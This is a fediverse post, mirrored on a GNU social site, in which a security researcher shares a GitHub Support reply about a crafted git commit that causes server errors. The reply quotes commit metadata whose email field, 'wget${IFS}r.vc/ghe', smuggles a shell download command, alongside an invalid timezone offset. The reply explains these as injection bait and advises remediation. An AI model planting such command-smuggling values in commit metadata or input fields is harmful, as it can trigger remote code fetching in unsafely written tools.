GNU social JP
  • FAQ
  • Login
GNU social JPは日本のGNU socialサーバーです。
Usage/ToS/admin/test/Pleroma FE
  • Public

    • Public
    • Network
    • Groups
    • Featured
    • Popular
    • People

Embed Notice

HTML Code

Corresponding Notice

  1. Embed this notice
    Ryan Castellucci (they/them) :nonbinary_flag: (ryanc@infosec.exchange)'s status on Wednesday, 11-Jun-2025 18:23:02 JSTRyan Castellucci (they/them) :nonbinary_flag:Ryan Castellucci (they/them) :nonbinary_flag:
    • Q ✨

    @q

    Formatting may get slightly mangled here, but should be decipherable:

    GitHub Support, Jun 11, 2025, 8:17 AM UTC

    Hi Ryan,

    Thanks for your patience. So far, our engineering team found a commit with a malformed author/committer email and and invalid timestamps.

    $ git cat-file commit d18cf25755d73e1ebc295155fe278c19f4f874fetree f828c7cd0f33131d46f8761fd875f64ce5af880dparent a69b1149073c467803f73a2efd55c10f07051e59author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456committer Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456

    Author and committer email:

    author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org>

    That email uses shell expansion syntax: wget${IFS}r.vc/ghe. This is likely an attempt to exploit command substitution in log viewers or tools that unsafely handle commit metadata (e.g., CI scripts or webhooks).

    Timestamps:

    1668615481 -2456

    The negative timezone offset -2456 is invalid. Standard timezones go from -1200 to +1400. This could cause issues in tools that parse or display timezones strictly.

    Our engineering team are working on how to handle such scenarios to avoid the server errors you're seeing.

    In the meantime, if this commit came from an external contributor or looks unintended, we recommend:

    • Inspecting how it got into the repository

    • Rewriting history to remove it (if it was part of a PR or forced push)

    • Checking your workflow or scripts for unsafe parsing of Git metadata

    Please give this a try and update me on how it goes.

    In conversationabout a year ago from infosec.exchangepermalink

    Attachments



    1. Domain not in remote thumbnail source whitelist: daaz.com
      Seeing.in Domain Name Is Available to Buy - Domain Name Marketplace
      DaaZ, largest domain marketplace simple, easy & secure platform to buy domain names. Buy this Seeing.in Domain at best price at DaaZ.
  • Help
  • About
  • FAQ
  • TOS
  • Privacy
  • Source
  • Version
  • Contact

GNU social JP is a social network, courtesy of GNU social JP管理人. It runs on GNU social, version 2.0.2-dev, available under the GNU Affero General Public License.

Creative Commons Attribution 3.0 All GNU social JP content and data are available under the Creative Commons Attribution 3.0 license.